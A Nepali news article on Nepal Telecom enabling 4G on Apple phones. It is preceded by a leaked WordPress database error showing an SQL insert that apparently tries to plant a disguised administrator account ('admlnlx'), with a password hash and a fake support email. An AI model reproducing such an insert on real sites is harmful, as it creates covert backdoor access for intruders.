WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYeSzHM1F5T.dNhxQzd9724cHl52OV1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 06:32:31', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २५–
नेपाल टेलिकमले सञ्चालनमा ल्याएको चौथो पुस्ताको इन्टरनेट (फोर जी) एप्पलका मोबाइल फोनमा समेत चल्ने भएको छ ।
टेलिकमकी प्रवक्ता प्रतिभा वैद्यका अनुसार एप्पलका मोबाइल फोन सेटमा फोर जी चल्ने व्यवस्था गरिदिन टेलिकमले गरेको आग्रहअनुसार आगामी मार्चदेखि सहजरुपमा फोर जी सञ्चालनमा ल्याउने जानकारी दिएको छ ।
टेलिकमका अनुसार एप्पलका सबै सिरिजका मोबाइल सेटमा फोर जी चल्नेछ । टेलिकमले गत पुस १७ गतेदेखि नेपालमा पहिलोपटक फोर जी एलटिइ सेवा सञ्चालनमा ल्याएको थियो । काठमाडौँ र पोखरामा सञ्चालनमा ल्याएको सो सेवा यही माघ २२ गतेदेखि प्रिपेड मोबाइलमा समेत सञ्चालनमा आएको छ ।
एप्पलका मोबाइल फोनमा फोर जी चलाउन एप्पलको वेबसाइटमा गएर सामान्य सेटिङ गर्नुपर्नेसमेत टेलिकमले जनाएको छ । अन्य स्मार्टफोनमा फोर जी चलेपनि एप्पलको फोनमा नचल्दा समस्या रहँदै आएको थियो ।